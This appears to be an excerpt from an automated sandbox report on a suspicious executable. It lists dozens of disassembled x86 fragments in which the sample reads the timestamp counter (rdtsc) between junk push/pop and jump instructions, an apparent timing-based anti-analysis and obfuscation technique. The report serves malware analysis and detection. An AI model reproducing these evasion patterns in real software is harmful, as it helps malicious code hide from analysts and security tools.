                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440A27 second address: 5440A57 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007F6F31ADDF78h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov bx, AEF0h 0x0000001a mov esi, ebx 0x0000001c popad 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F001B second address: 53F00C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6F31405BDEh 0x0000000f push eax 0x00000010 jmp 00007F6F31405BDBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov al, 4Ch 0x00000019 jmp 00007F6F31405BE1h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007F6F31405BDEh 0x00000026 and esp, FFFFFFF8h 0x00000029 jmp 00007F6F31405BE0h 0x0000002e xchg eax, ecx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F6F31405BDEh 0x00000036 or ecx, 7A61F678h 0x0000003c jmp 00007F6F31405BDBh 0x00000041 popfd 0x00000042 mov ebx, esi 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 mov ax, bx 0x0000004a mov dl, 5Ch 0x0000004c popad 0x0000004d xchg eax, ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F00C0 second address: 53F00EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6F31ADDF71h 0x0000000a adc esi, 69CF49C6h 0x00000010 jmp 00007F6F31ADDF71h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F00EF second address: 53F010B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F010B second address: 53F0111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0111 second address: 53F0164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 mov si, 56F3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F6F31405BE9h 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F6F31405BDEh 0x00000019 mov ebx, dword ptr [ebp+10h] 0x0000001c pushad 0x0000001d mov edi, ecx 0x0000001f mov dl, al 0x00000021 popad 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6F31405BE1h 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0164 second address: 53F0198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6F31ADDF78h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0198 second address: 53F019C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F019C second address: 53F01A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F01A2 second address: 53F01B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BDDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F01B3 second address: 53F01B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F01B7 second address: 53F01DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6F31405BE8h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F01DC second address: 53F01E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F01E2 second address: 53F01E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F01E6 second address: 53F0202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 416692BBh 0x0000000f mov dx, ax 0x00000012 popad 0x00000013 mov dword ptr [esp], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0202 second address: 53F0211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0211 second address: 53F0252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F6F31ADDF6Eh 0x00000010 je 00007F6FA361C33Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6F31ADDF6Ah 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0252 second address: 53F0261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0261 second address: 53F02FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 movzx esi, bx 0x00000014 pushfd 0x00000015 jmp 00007F6F31ADDF79h 0x0000001a and cx, DA46h 0x0000001f jmp 00007F6F31ADDF71h 0x00000024 popfd 0x00000025 popad 0x00000026 je 00007F6FA361C2D6h 0x0000002c pushad 0x0000002d jmp 00007F6F31ADDF6Ch 0x00000032 pushfd 0x00000033 jmp 00007F6F31ADDF72h 0x00000038 sbb si, B218h 0x0000003d jmp 00007F6F31ADDF6Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov edx, dword ptr [esi+44h] 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F02FC second address: 53F0300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0300 second address: 53F0306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0306 second address: 53F0346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F6F31405BE0h 0x00000011 test edx, 61000000h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6F31405BE7h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0346 second address: 53F0394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F6FA361C28Bh 0x0000000f pushad 0x00000010 mov ecx, 42479113h 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 test byte ptr [esi+48h], 00000001h 0x0000001c jmp 00007F6F31ADDF72h 0x00000021 jne 00007F6FA361C27Fh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0394 second address: 53F0398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F0398 second address: 53F03B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E075E second address: 53E0763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0763 second address: 53E07A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6F31ADDF70h 0x0000000a adc eax, 4C4FF9E8h 0x00000010 jmp 00007F6F31ADDF6Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6F31ADDF75h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E07A5 second address: 53E0817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F31405BE7h 0x00000009 jmp 00007F6F31405BE3h 0x0000000e popfd 0x0000000f push eax 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov di, FFA2h 0x0000001d pushfd 0x0000001e jmp 00007F6F31405BE3h 0x00000023 adc esi, 5557B49Eh 0x00000029 jmp 00007F6F31405BE9h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0817 second address: 53E08B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007F6F31ADDF73h 0x0000000c sub cx, BEAEh 0x00000011 jmp 00007F6F31ADDF79h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and esp, FFFFFFF8h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F6F31ADDF6Ch 0x00000024 sub si, B828h 0x00000029 jmp 00007F6F31ADDF6Bh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F6F31ADDF78h 0x00000035 adc cl, FFFFFF88h 0x00000038 jmp 00007F6F31ADDF6Bh 0x0000003d popfd 0x0000003e popad 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 jmp 00007F6F31ADDF6Bh 0x00000048 mov edi, esi 0x0000004a popad 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E08B0 second address: 53E093B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F31405BDBh 0x00000009 or cx, 4F7Eh 0x0000000e jmp 00007F6F31405BE9h 0x00000013 popfd 0x00000014 mov eax, 19B9E5C7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F6F31405BE3h 0x00000024 adc esi, 453EC18Eh 0x0000002a jmp 00007F6F31405BE9h 0x0000002f popfd 0x00000030 mov esi, 663CF497h 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F6F31405BE4h 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E093B second address: 53E094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E094A second address: 53E0973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 095369AEh 0x00000012 mov bl, 72h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0973 second address: 53E09F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, F0C2h 0x0000000f pushfd 0x00000010 jmp 00007F6F31ADDF73h 0x00000015 sub ah, FFFFFFBEh 0x00000018 jmp 00007F6F31ADDF79h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 jmp 00007F6F31ADDF6Eh 0x00000025 mov esi, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6F31ADDF6Dh 0x00000031 jmp 00007F6F31ADDF6Bh 0x00000036 popfd 0x00000037 push ecx 0x00000038 pop ebx 0x00000039 popad 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E09F2 second address: 53E0A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007F6F31405BE7h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0A2C second address: 53E0A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0A32 second address: 53E0A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6FA2F4B524h 0x0000000f pushad 0x00000010 jmp 00007F6F31405BDEh 0x00000015 push eax 0x00000016 mov ebx, 42A2EBB4h 0x0000001b pop ebx 0x0000001c popad 0x0000001d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov dl, A2h 0x00000029 pushfd 0x0000002a jmp 00007F6F31405BDEh 0x0000002f or eax, 19260968h 0x00000035 jmp 00007F6F31405BDBh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0A8B second address: 53E0B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6F31ADDF6Ch 0x00000012 sub si, 46F8h 0x00000017 jmp 00007F6F31ADDF6Bh 0x0000001c popfd 0x0000001d pushad 0x0000001e mov bx, ax 0x00000021 pushfd 0x00000022 jmp 00007F6F31ADDF72h 0x00000027 jmp 00007F6F31ADDF75h 0x0000002c popfd 0x0000002d popad 0x0000002e popad 0x0000002f je 00007F6FA3623811h 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jmp 00007F6F31ADDF73h 0x0000003d mov ah, C7h 0x0000003f popad 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B17 second address: 53E0B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BE1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B2C second address: 53E0B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 movsx ebx, cx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0B41 second address: 53E0BD0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6F31405BE2h 0x00000008 add ecx, 479DD078h 0x0000000e jmp 00007F6F31405BDBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 jne 00007F6FA2F4B421h 0x0000001d jmp 00007F6F31405BE5h 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 pushad 0x00000026 mov di, cx 0x00000029 pushfd 0x0000002a jmp 00007F6F31405BE8h 0x0000002f or cx, B538h 0x00000034 jmp 00007F6F31405BDBh 0x00000039 popfd 0x0000003a popad 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F6F31405BE5h 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547077F second address: 547079C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547079C second address: 54707AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BDCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54707AC second address: 54707B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54707B0 second address: 5470819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F6F31405BDAh 0x00000010 xor ecx, 48C8C508h 0x00000016 jmp 00007F6F31405BDBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F6F31405BE8h 0x00000022 adc ax, 6768h 0x00000027 jmp 00007F6F31405BDBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esp], ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 jmp 00007F6F31405BDBh 0x00000039 mov ecx, 086FB84Fh 0x0000003e popad 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54608F4 second address: 54608FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54608FA second address: 546093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F6F31405BDCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F6F31405BE0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F6F31405BE7h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546093D second address: 5460943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400038 second address: 540004D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540004D second address: 5400051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400051 second address: 540005E instructions: 0x00000000 rdtsc 0x00000002 mov ax, 31F7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a movzx ecx, dx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540005E second address: 540008B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6F31ADDF75h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540008B second address: 54000A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2EDF2C92h 0x00000008 mov cx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54000A0 second address: 54000A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54000A6 second address: 54000AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460C2B second address: 5460C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460C31 second address: 5460CF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F31405BE0h 0x00000009 sub si, D688h 0x0000000e jmp 00007F6F31405BDBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F6F31405BE8h 0x0000001a and eax, 5C3E38E8h 0x00000020 jmp 00007F6F31405BDBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a pushad 0x0000002b mov edx, 702A718Ah 0x00000030 mov dx, 1C56h 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 pushad 0x0000003a pushad 0x0000003b mov ebx, ecx 0x0000003d push eax 0x0000003e pop edi 0x0000003f popad 0x00000040 pushfd 0x00000041 jmp 00007F6F31405BE0h 0x00000046 sbb si, 1678h 0x0000004b jmp 00007F6F31405BDBh 0x00000050 popfd 0x00000051 popad 0x00000052 mov eax, dword ptr [eax] 0x00000054 jmp 00007F6F31405BE9h 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d jmp 00007F6F31405BE1h 0x00000062 pop eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5460CF5 second address: 5460CFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113945E second address: 1139464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1139464 second address: 113946E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6F31ADDF6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105A4 second address: 54105AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105AA second address: 54105AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105AE second address: 54105B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105B2 second address: 54105C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f mov bx, 5D10h 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105C6 second address: 54105CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105CD second address: 5410622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007F6F31ADDF6Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F6F31ADDF70h 0x00000016 push FFFFFFFEh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F6F31ADDF6Eh 0x0000001f sub esi, 7C5C0BB8h 0x00000025 jmp 00007F6F31ADDF6Bh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d mov ecx, 2BC9BD85h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410622 second address: 5410679 instructions: 0x00000000 rdtsc 0x00000002 mov cx, AD01h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 call 00007F6F31405BD9h 0x0000000e jmp 00007F6F31405BDCh 0x00000013 push eax 0x00000014 jmp 00007F6F31405BDBh 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F6F31405BE9h 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6F31405BDCh 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410679 second address: 541068B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31ADDF6Eh 0x00000009 rdtsc
